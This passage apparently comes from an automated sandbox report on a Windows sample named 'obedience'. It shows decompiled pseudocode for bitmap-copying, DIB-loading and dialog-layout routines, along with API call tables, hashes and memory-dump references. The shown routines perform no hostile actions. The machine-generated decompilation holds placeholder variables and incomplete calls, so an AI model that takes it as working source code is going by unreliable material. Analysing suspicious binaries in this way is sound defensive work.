				_t107 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E00429C00(_t107);
					_v12 = 0;
					_v20 = 0;
					_push(_t127);
					_push(0x42a907);
					_push( *[fs:eax]);
					 *[fs:eax] = _t130;
					_push(0);
					L00407658();
					_v12 = E00426EF8(0);
					_push(_v12);
					L00407280();
					_v20 = E00426EF8(_v12);
					_push(0);
					_push(1);
					_push(1);
					_push(_v108);
					_t64 = _v112;
					_push(_t64);
					L00407268();
					_v8 = _t64;
					if(_v8 == 0) {
						L17:
						_t65 = 0;
						_pop(_t116);
						 *[fs:eax] = _t116;
						_push(0x42a90e);
						if(_v20 != 0) {
							_t65 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							_t66 = _v12;
							_push(_t66);
							_push(0);
							L004078C0();
							return _t66;
						}
						return _t65;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(__ecx != 0x1fffffff) {
							_push(_v12);
							L00407280();
							_v16 = E00426EF8(_v12);
							_push(_t127);
							_push(0x42a8bf);
							_push( *[fs:eax]);
							 *[fs:eax] = _t130;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t107 = E0042A044(_t107, _t123, _t123, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t107);
							if(_t123 != 0) {
								_push(0);
								_push(_t123);
								_push(_v16);
								L00407420();
								_push(_v16);
								L004073F0();
								_push(0);
								_push(_t123);
								_push(_v20);
								L00407420();
								_push(_v20);
								L004073F0();
							}
							_t77 = SetBkColor(_v16, _t120);
							_push(0xcc0020);
							_push(0);
							_push(0);
							_push(_v16);
							_push(_v108);
							_push(_v112);
							_push(0);
							_push(0);
							_push(_v20);
							L00407258();
							SetBkColor(_v16, _t77);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t107);
							}
							_pop(_t117);
							 *[fs:eax] = _t117;
							_push(0x42a8c6);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L17;
						}
					}
				}
			}



























      0x0042a70d
      0x0042a70f
      0x0042a715
      0x0042a717
      0x0042a719
      0x0042a71d
      0x0042a722
      0x0042a917
      0x0042a73c
      0x0042a73e
      0x0042a745
      0x0042a74a
      0x0042a74f
      0x0042a750
      0x0042a755
      0x0042a758
      0x0042a75b
      0x0042a75d
      0x0042a767
      0x0042a76d
      0x0042a76e
      0x0042a778
      0x0042a77b
      0x0042a77d
      0x0042a77f
      0x0042a784
      0x0042a785
      0x0042a788
      0x0042a789
      0x0042a78e
      0x0042a795
      0x0042a8d9
      0x0042a8d9
      0x0042a8db
      0x0042a8de
      0x0042a8e1
      0x0042a8ea
      0x0042a8f0
      0x0042a8f0
      0x0042a8f9
      0x0042a8fb
      0x0042a8fe
      0x0042a8ff
      0x0042a901
      0x00000000
      0x0042a901
      0x0042a906
      0x0042a79b
      0x0042a7a8
      0x0042a7b1
      0x0042a7d2
      0x0042a7d3
      0x0042a7dd
      0x0042a7e2
      0x0042a7e3
      0x0042a7e8
      0x0042a7eb
      0x0042a7f2
      0x0042a812
      0x0042a7f4
      0x0042a7f4
      0x0042a7fa
      0x0042a80e
      0x0042a80e
      0x0042a820
      0x0042a825
      0x0042a827
      0x0042a829
      0x0042a82d
      0x0042a82e
      0x0042a836
      0x0042a837
      0x0042a83c
      0x0042a83e
      0x0042a842
      0x0042a843
      0x0042a84b
      0x0042a84c
      0x0042a84c
      0x0042a856
      0x0042a85d
      0x0042a862
      0x0042a864
      0x0042a869
      0x0042a86d
      0x0042a871
      0x0042a872
      0x0042a874
      0x0042a879
      0x0042a87a
      0x0042a884
      0x0042a88d
      0x0042a897
      0x0042a897
      0x0042a8a0
      0x0042a8a3
      0x0042a8a3
      0x0042a8aa
      0x0042a8ad
      0x0042a8b0
      0x0042a8be
      0x0042a7b3
      0x0042a7c5
      0x0042a8ca
      0x0042a8d4
      0x0042a8d4
      0x00000000
      0x0042a8ca
      0x0042a7b1
      0x0042a795

      APIs
      • GetObjectA.GDI32(?,00000054,?), ref: 0042A72F
      • 73BEAC50.USER32(00000000,00000000,0042A907,?,?,00000054,?), ref: 0042A75D
      • 73BEA590.GDI32(?,00000000,00000000,0042A907,?,?,00000054,?), ref: 0042A76E
      • 73BEA410.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,0042A907,?,?,00000054,?), ref: 0042A789
      • SelectObject.GDI32(?,00000000), ref: 0042A7A3
      • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 0042A7C5
      • 73BEA590.GDI32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,0042A907,?,?,00000054,?), ref: 0042A7D3
      • SelectObject.GDI32(?), ref: 0042A81B
      • 73BEB410.GDI32(?,?,00000000,?,?,00000000,0042A8BF,?,?,?,00000000,?,?,00000001,00000001,00000000), ref: 0042A82E
      • 73BEB150.GDI32(?,?,?,00000000,?,?,00000000,0042A8BF,?,?,?,00000000,?,?,00000001,00000001), ref: 0042A837
      • 73BEB410.GDI32(?,?,00000000,?,?,?,00000000,?,?,00000000,0042A8BF,?,?,?,00000000,?), ref: 0042A843
      • 73BEB150.GDI32(?,?,?,00000000,?,?,?,00000000,?,?,00000000,0042A8BF,?,?,?,00000000), ref: 0042A84C
      • SetBkColor.GDI32(?), ref: 0042A856
      • 73BF97E0.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,?,?,?,00000000,0042A8BF), ref: 0042A87A
      • SetBkColor.GDI32(?,00000000), ref: 0042A884
      • SelectObject.GDI32(?,00000000), ref: 0042A897
      • DeleteObject.GDI32 ref: 0042A8A3
      • DeleteDC.GDI32(?), ref: 0042A8B9
      • SelectObject.GDI32(?,00000000), ref: 0042A8D4
      • DeleteDC.GDI32(00000000), ref: 0042A8F0
      • 73BEB380.USER32(00000000,00000000,0042A90E,00000001,00000000,?,00000000,00000000,0042A907,?,?,00000054,?), ref: 0042A901
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Object$Select$Delete$A590B150B410Color$A410B380
      • String ID:
      • API String ID: 2498167796-0
      • Opcode ID: cb9497e594cdfa0144c8054d926578b525af7d76be08e77879cf5cb8d3eea044
      • Instruction ID: c5d24e51c5f042388fee44124175c2a35ead77c821609f90a659b66130d5fabb
      • Opcode Fuzzy Hash: cb9497e594cdfa0144c8054d926578b525af7d76be08e77879cf5cb8d3eea044
      • Instruction Fuzzy Hash: 30512171F04218ABDB10EBE9DC45FAFB7FCAB08704F51446AB614F7281D678A940CB69
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042B430 Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 351COMMON
      Download Yara Rule
      C-Code - Quality: 65%
      			E0042B430(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v16;
				struct HDC__* _v20;
				char _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v37;
				intOrPtr _v44;
				void* _v48;
				struct HDC__* _v52;
				intOrPtr _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t163;
				void* _t166;
				void* _t174;
				void* _t183;
				signed int _t188;
				intOrPtr _t189;
				struct HDC__* _t190;
				struct HDC__* _t204;
				signed int _t208;
				signed short _t214;
				intOrPtr _t241;
				intOrPtr* _t245;
				intOrPtr _t251;
				char* _t278;
				intOrPtr _t289;
				intOrPtr _t290;
				intOrPtr _t295;
				signed int _t297;
				signed int _t317;
				void* _t319;
				void* _t320;
				signed int _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				intOrPtr _t325;

				_t316 = __edi;
				_t323 = _t324;
				_t325 = _t324 + 0xffffff54;
				_t319 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				_t278 =  &_v36;
				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t322);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E00402ACC(_v36 + 0x40c, 4, _t278);
				_v64 = _v28;
				_push(_t323);
				_push(0x42b94d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_push(_t323);
				_push(0x42b920);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t320 = _t319 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E00403BC0(1);
						if(_a4 == 0) {
							E00403498( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t320;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						E0041C440(_v60,  *_v60, _v36 - 4, _v12, _t316, _t320, _t320, 0);
						 *((intOrPtr*)( *_v60 + 0x14))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t251 = _v64;
					E00403498(_t251, 0x28);
					_t241 = _t251;
					 *(_t241 + 4) = _v72 & 0x0000ffff;
					 *(_t241 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t241 + 0xc)) = _v68;
					 *((short*)(_t241 + 0xe)) = _v66;
					_t320 = _t319 - 0xc;
				}
				_t245 = _v64;
				 *_t245 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t245 + 0xc)) != 1) {
					E00426DD8();
				}
				if(_v36 == 0x28) {
					_t214 =  *(_t245 + 0xe);
					if(_t214 == 0x10 || _t214 == 0x20) {
						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
							E0041C3D0(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t320 = _t320 - 0xc;
						}
					}
				}
				if( *(_t245 + 0x20) == 0) {
					 *(_t245 + 0x20) = E00427068( *(_t245 + 0xe));
				}
				_t317 = _v37 & 0x000000ff;
				_t257 =  *(_t245 + 0x20) * 0;
				E0041C3D0(_v12,  *(_t245 + 0x20) * 0, _v32);
				_t321 = _t320 -  *(_t245 + 0x20) * 0;
				if( *(_t245 + 0x14) == 0) {
					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
					_t208 = E00427088( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
					asm("cdq");
					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
				}
				_t160 =  *(_t245 + 0x14);
				if(_t321 > _t160) {
					_t321 = _t160;
				}
				if(_v37 != 0) {
					_t160 = E00427330(_v32);
				}
				_push(0);
				L00407658();
				_v16 = E00426EF8(_t160);
				_push(_t323);
				_push(0x42b89b);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_t163 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t163 == 0 || _t163 == 3) {
					if( *0x48e4f0 == 0) {
						_push(0);
						_push(0);
						_push( &_v24);
						_push(0);
						_push(_v28);
						_t166 = _v16;
						_push(_t166);
						L00407290();
						_v44 = _t166;
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0040E218(_t245, _t257, _t317, _t321);
							} else {
								E00426DD8();
							}
						}
						_push(_t323);
						_push( *[fs:eax]);
						 *[fs:eax] = _t325;
						E0041C3D0(_v12, _t321, _v24);
						_pop(_t289);
						 *[fs:eax] = _t289;
						_t290 = 0x42b86a;
						 *[fs:eax] = _t290;
						_push(0x42b8a2);
						_t174 = _v16;
						_push(_t174);
						_push(0);
						L004078C0();
						return _t174;
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E00402ACC(_t321, _t257, 0);
					_push(_t323);
					_push(0x42b803);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_t263 = _t321;
					E0041C3D0(_v12, _t321, _v24);
					_push(_v16);
					L00407280();
					_v20 = E00426EF8(_v16);
					_push(1);
					_push(1);
					_t183 = _v16;
					_push(_t183);
					L00407278();
					_v48 = SelectObject(_v20, _t183);
					_v56 = 0;
					_t188 =  *(_v64 + 0x20);
					if(_t188 > 0) {
						_t263 = _t188;
						_v52 = E004275F4(0, _t188);
						_push(0);
						_push(_v52);
						_t204 = _v20;
						_push(_t204);
						L00407420();
						_v56 = _t204;
						_push(_v20);
						L004073F0();
					}
					_push(_t323);
					_push(0x42b7d7);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_push(0);
					_t189 = _v28;
					_push(_t189);
					_push(_v24);
					_push(4);
					_push(_t189);
					_t190 = _v20;
					_push(_t190);
					L00407298();
					_v44 = _t190;
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0040E218(_t245, _t263, _t317, _t321);
						} else {
							E00426DD8();
						}
					}
					_pop(_t295);
					 *[fs:eax] = _t295;
					_push(0x42b7de);
					if(_v56 != 0) {
						_push(0xffffffff);
						_push(_v56);
						_push(_v20);
						L00407420();
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}





















































      0x0042b430
      0x0042b431
      0x0042b433
      0x0042b43c
      0x0042b43e
      0x0042b441
      0x0042b446
      0x0042b44b
      0x0042b450
      0x0042b453
      0x0042b460
      0x0042b467
      0x0042b46f
      0x0042b471
      0x0042b471
      0x0042b488
      0x0042b48e
      0x0042b493
      0x0042b494
      0x0042b499
      0x0042b49c
      0x0042b4a1
      0x0042b4a2
      0x0042b4a7
      0x0042b4aa
      0x0042b4b1
      0x0042b510
      0x0042b513
      0x0042b519
      0x0042b51f
      0x0042b539
      0x0042b540
      0x0042b54f
      0x0042b554
      0x0042b562
      0x0042b56e
      0x0042b56e
      0x0042b57e
      0x0042b58e
      0x0042b5a2
      0x0042b5b1
      0x0042b5c3
      0x0042b5c9
      0x0042b5c9
      0x0042b4b3
      0x0042b4c3
      0x0042b4c6
      0x0042b4d2
      0x0042b4d7
      0x0042b4dd
      0x0042b4e4
      0x0042b4eb
      0x0042b4f3
      0x0042b4f7
      0x0042b4f7
      0x0042b5cc
      0x0042b5d2
      0x0042b5da
      0x0042b5e2
      0x0042b5e4
      0x0042b5e4
      0x0042b5ed
      0x0042b5ef
      0x0042b5f7
      0x0042b603
      0x0042b610
      0x0042b615
      0x0042b619
      0x0042b619
      0x0042b603
      0x0042b5f7
      0x0042b620
      0x0042b62b
      0x0042b62b
      0x0042b631
      0x0042b63d
      0x0042b646
      0x0042b658
      0x0042b65e
      0x0042b660
      0x0042b66c
      0x0042b676
      0x0042b67b
      0x0042b67e
      0x0042b67e
      0x0042b681
      0x0042b686
      0x0042b688
      0x0042b688
      0x0042b68e
      0x0042b693
      0x0042b693
      0x0042b698
      0x0042b69a
      0x0042b6a4
      0x0042b6a9
      0x0042b6aa
      0x0042b6af
      0x0042b6b2
      0x0042b6b8
      0x0042b6bd
      0x0042b6cb
      0x0042b80a
      0x0042b80c
      0x0042b811
      0x0042b812
      0x0042b817
      0x0042b818
      0x0042b81b
      0x0042b81c
      0x0042b821
      0x0042b828
      0x0042b837
      0x0042b840
      0x0042b839
      0x0042b839
      0x0042b839
      0x0042b837
      0x0042b847
      0x0042b84d
      0x0042b850
      0x0042b85b
      0x0042b862
      0x0042b865
      0x0042b884
      0x0042b887
      0x0042b88a
      0x0042b88f
      0x0042b892
      0x0042b893
      0x0042b895
      0x0042b89a
      0x00000000
      0x00000000
      0x00000000
      0x0042b6d1
      0x0042b6d1
      0x0042b6d3
      0x0042b6dd
      0x0042b6e2
      0x0042b6e3
      0x0042b6e8
      0x0042b6eb
      0x0042b6f1
      0x0042b6f6
      0x0042b6fe
      0x0042b6ff
      0x0042b709
      0x0042b70c
      0x0042b70e
      0x0042b710
      0x0042b713
      0x0042b714
      0x0042b723
      0x0042b728
      0x0042b72e
      0x0042b733
      0x0042b735
      0x0042b741
      0x0042b744
      0x0042b749
      0x0042b74a
      0x0042b74d
      0x0042b74e
      0x0042b753
      0x0042b759
      0x0042b75a
      0x0042b75a
      0x0042b761
      0x0042b762
      0x0042b767
      0x0042b76a
      0x0042b76d
      0x0042b76f
      0x0042b772
      0x0042b776
      0x0042b777
      0x0042b779
      0x0042b77a
      0x0042b77d
      0x0042b77e
      0x0042b783
      0x0042b78a
      0x0042b793
      0x0042b79c
      0x0042b795
      0x0042b795
      0x0042b795
      0x0042b793
      0x0042b7a3
      0x0042b7a6
      0x0042b7a9
      0x0042b7b2
      0x0042b7b4
      0x0042b7b9
      0x0042b7bd
      0x0042b7be
      0x0042b7be
      0x0042b7d6
      0x0042b7d6

      APIs
      • 73BEAC50.USER32(00000000,?,00000000,0042B94D,?,?), ref: 0042B69A
      • 73BEA590.GDI32(00000001,00000000,0042B803,?,00000000,0042B89B,?,00000000,?,00000000,0042B94D,?,?), ref: 0042B6FF
      • 73BEA520.GDI32(00000001,00000001,00000001,00000001,00000000,0042B803,?,00000000,0042B89B,?,00000000,?,00000000,0042B94D,?,?), ref: 0042B714
      • SelectObject.GDI32(?,00000000), ref: 0042B71E
      • 73BEB410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042B803,?,00000000,0042B89B,?,00000000), ref: 0042B74E
      • 73BEB150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042B803,?,00000000,0042B89B), ref: 0042B75A
      • 73BEA7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,0042B7D7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042B77E
      • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,0042B7D7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042B78C
      • 73BEB410.GDI32(?,00000000,000000FF,0042B7DE,00000000,?,00000000,00000000,0042B7D7,?,?,00000000,00000001,00000001,00000001,00000001), ref: 0042B7BE
      • SelectObject.GDI32(?,?), ref: 0042B7CB
      • DeleteObject.GDI32(00000000), ref: 0042B7D1
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Object$B410Select$A520A590B150DeleteErrorLast
      • String ID: ($BM$d}A
      • API String ID: 3415089252-1836360114
      • Opcode ID: 6effc5624fafab1c5065017b6cf8d6cba7e71a5f88f5188ee129ee5574d3360e
      • Instruction ID: f771b1029cabab020be9d832f8947b46938341ea818d3eeb431794def607108f
      • Opcode Fuzzy Hash: 6effc5624fafab1c5065017b6cf8d6cba7e71a5f88f5188ee129ee5574d3360e
      • Instruction Fuzzy Hash: 73D13074F002189FDF14EFA9D885AAEBBB5EF49304F54846AE904E7391D7389840CB69
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0043D70C Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 454windowCOMMON
      Download Yara Rule
      C-Code - Quality: 89%
      			E0043D70C(intOrPtr __eax, void* __ebx, signed char __ecx, char __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _v8;
				char _v9;
				signed int _v11;
				intOrPtr* _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				signed int _v40;
				int _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				char _v61;
				char _v62;
				CHAR* _v68;
				intOrPtr* _v72;
				char _v76;
				intOrPtr* _v80;
				struct tagRECT _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				intOrPtr _t203;
				int _t220;
				signed int _t224;
				void* _t228;
				CHAR* _t231;
				signed int _t240;
				signed int _t256;
				signed int _t264;
				intOrPtr* _t267;
				signed int _t296;
				signed int _t297;
				intOrPtr _t321;
				void* _t339;
				signed int _t351;
				signed int _t356;
				CHAR* _t363;
				int _t374;
				void* _t375;
				void* _t376;
				void* _t377;
				void* _t378;
				signed int _t419;
				signed int _t422;
				intOrPtr _t441;
				void* _t448;
				int _t457;
				intOrPtr* _t459;
				int _t463;
				intOrPtr* _t464;
				intOrPtr _t465;
				intOrPtr* _t470;
				void* _t471;
				void* _t473;
				void* _t477;
				void* _t481;
				void* _t485;
				void* _t490;
				void* _t491;
				void* _t500;
				void* _t506;

				_t506 = __fp0;
				_v112 = 0;
				_v108 = 0;
				_v104 = 0;
				_v100 = 0;
				_v11 = __ecx;
				_v9 = __edx;
				_v8 = __eax;
				 *[fs:eax] = _t473 + 0xffffff94;
				_v16 = E0043D230(1, __edi);
				_t384 =  *_v16;
				 *((intOrPtr*)( *_v16 + 0x70))( *[fs:eax], 0x43dc7b, _t473, __edi, __esi, __ebx, _t471);
				E0045E3DC(_v16, 3);
				E00426A20(E0045E694(_v16));
				 *((char*)(_v16 + 0x22d)) = 1;
				_t203 = _v16;
				 *((intOrPtr*)(_t203 + 0x1dc)) = _v16;
				 *((intOrPtr*)(_t203 + 0x1d8)) = E0043D2C0;
				E0043D064(E0045E694(_v16),  &_v24);
				_t374 = _v24;
				_v28 = MulDiv(8, _t374, 4);
				_t463 = _v20;
				_v32 = MulDiv(8, _t463, 8);
				_t457 = MulDiv(0xa, _t374, 4);
				_v36 = MulDiv(0xa, _t463, 8);
				_v40 = MulDiv(0x32, _t374, 4);
				_t375 = 0;
				_t464 = 0x490a88;
				_v76 = 0x48eb7c;
				do {
					_t477 = _t375 - 0xf;
					if(_t477 <= 0) {
						asm("bt [ebp-0x7], eax");
					}
					if(_t477 < 0) {
						if( *_t464 == 0) {
							_t384 = 0;
							E00418618(0, 0, 0,  &_v96, 0);
							_t356 = E00446C5C(_v16);
							_t35 =  &_v76; // 0x48eb7c
							E00406A3C( *((intOrPtr*)( *_t35)), 0,  &_v100);
							_t363 = E00404F00(_v100);
							DrawTextA(E00426B00(E0045E694(_v16)), _t363, 0xffffffff,  &_v96, _t356 | 0x00000420);
							 *_t464 = _v96.right - _v96.left + 8;
						}
						_t351 =  *_t464;
						if(_t351 > _v40) {
							_v40 = _t351;
						}
					}
					_t375 = _t375 + 1;
					_v76 = _v76 + 4;
					_t464 = _t464 + 4;
					_t481 = _t375 - 0xb;
				} while (_t481 != 0);
				_v44 = MulDiv(0xe, _v20, 8);
				_v48 = MulDiv(4, _v24, 4);
				_push(0);
				_t220 = E00461FD4() >> 1;
				if(_t481 < 0) {
					asm("adc eax, 0x0");
				}
				SetRect( &_v96, 0, 0, _t220, ??);
				_t224 = E00446C5C(_v16);
				_t228 = E00404D00(_v8);
				_t231 = E00404F00(_v8);
				DrawTextA(E00426B00(E0045E694(_v16)), _t231, _t228 + 1,  &_v96, _t224 | 0x00000450);
				_v68 =  *((intOrPtr*)(0x48eb3c));
				_t465 = _v96.right;
				_v52 = _v96.bottom;
				if(_v68 != 0) {
					_t465 = _t465 + _t457 + 0x20;
					if(_v52 < 0x20) {
						_v52 = 0x20;
					}
				}
				_t240 = 0;
				_t376 = 0;
				do {
					_t485 = _t376 - 0xf;
					if(_t485 <= 0) {
						asm("bt [ebp-0x7], edx");
					}
					if(_t485 < 0) {
						_t240 = _t240 + 1;
					}
					_t376 = _t376 + 1;
				} while (_t376 != 0xb);
				_t377 = 0;
				if(_t240 != 0) {
					_t377 = _v40 * _t240 + (_t240 - 1) * _v48;
				}
				E0045D9FC(_v16, E0042CC24(_t465, _t377) + _v28 + _v28);
				_t490 = _v52 + _v44 + _v36 + _v32 + _v32;
				E0045DA2C(_v16, _v52 + _v44 + _v36 + _v32 + _v32);
				_t419 = E00461FD4() >> 1;
				if(_t490 < 0) {
					asm("adc edx, 0x0");
				}
				_t256 =  *(_v16 + 0x48) >> 1;
				if(_t490 < 0) {
					asm("adc eax, 0x0");
				}
				_t491 = _t419 - _t256;
				E00444098(_v16);
				_t422 = E00461FC8() >> 1;
				if(_t491 < 0) {
					asm("adc edx, 0x0");
				}
				_t264 =  *(_v16 + 0x4c) >> 1;
				if(_t491 < 0) {
					asm("adc eax, 0x0");
				}
				E004440BC(_v16, _t422 - _t264);
				if(_v9 == 4) {
					_t267 =  *0x48f840; // 0x490b7c
					E00464138( *_t267,  &_v108);
					E00444958(_v16, _t377, _v108, _t465);
				} else {
					E00406A3C( *0x0048EB28, _t384,  &_v104);
					E00444958(_v16, _t377, _v104, _t465);
				}
				_t493 = _v68;
				if(_v68 != 0) {
					_t459 = E0043A4F0(1);
					 *((intOrPtr*)( *_t459 + 0x18))();
					 *((intOrPtr*)( *_t459 + 0x68))();
					_push(LoadIconA(0, _v68));
					_t339 = E00428A00( *((intOrPtr*)(_t459 + 0x168)));
					_pop(_t448);
					E0042C580(_t339, _t448);
					 *((intOrPtr*)( *_t459 + 0x84))(0x20, 0x20);
				}
				_t458 = E00434E40(_v16, 1);
				 *((intOrPtr*)(_v16 + 0x2f8)) = _t458;
				 *((intOrPtr*)( *_t458 + 0x18))();
				 *((intOrPtr*)( *_t458 + 0x68))();
				E00435318(_t458, 1);
				E00444958(_t458, _t377, _v8, _t465);
				E004442E8(_t458,  &_v96);
				 *((intOrPtr*)( *_t458 + 0x70))();
				_v60 = _t465 - _v96.right + _v28;
				if(E00403DF8(_t458, _t493) != 0) {
					_v60 = E0044432C(_v16) - _v60 -  *((intOrPtr*)(_t458 + 0x48));
				}
				 *((intOrPtr*)( *_t458 + 0x84))(_v96.bottom, _v96.right);
				if((_v11 & 0x00000004) == 0) {
					__eflags = _v11 & 0x00000001;
					if((_v11 & 0x00000001) == 0) {
						_v61 = 5;
					} else {
						_v61 = 0;
					}
				} else {
					_v61 = 2;
				}
				if((_v11 & 0x00000008) == 0) {
					__eflags = _v11 & 0x00000002;
					if((_v11 & 0x00000002) == 0) {
						_v62 = 2;
					} else {
						_v62 = 1;
					}
				} else {
					_v62 = 3;
				}
				_t296 = E0044432C(_v16) - _t377;
				_t297 = _t296 >> 1;
				if(_t296 < 0) {
					asm("adc eax, 0x0");
				}
				_v56 = _t297;
				_t378 = 0;
				_v76 = 0x48eb50;
				_t470 = 0x48eb7c;
				_v80 = 0x48eba8;
				do {
					_t500 = _t378 - 0xf;
					if(_t500 <= 0) {
						asm("bt [ebp-0x7], eax");
					}
					if(_t500 < 0) {
						_v72 = E00438748(_v16, 1, _t458, _t506);
						 *((intOrPtr*)( *_v72 + 0x18))();
						 *((intOrPtr*)( *_v72 + 0x68))();
						E00406A3C( *_t470,  *_v72,  &_v112);
						E00444958(_v72, _t378, _v112, _t470);
						 *((intOrPtr*)(_v72 + 0x214)) =  *_v80;
						_t501 = _t378 - _v61;
						if(_t378 == _v61) {
							E00438828(_v72, 1, _t501);
						}
						if(_t378 == _v62) {
							 *((char*)(_v72 + 0x211)) = 1;
						}
						_t458 =  *_v72;
						 *((intOrPtr*)( *_v72 + 0x84))(_v44, _v40);
						_v56 = _v56 + _v40 + _v48;
						if(_t378 == 0xa) {
							_t321 = _v72;
							 *((intOrPtr*)(_t321 + 0x124)) = _v16;
							 *((intOrPtr*)(_t321 + 0x120)) = 0x43d2a8;
						}
					}
					_t378 = _t378 + 1;
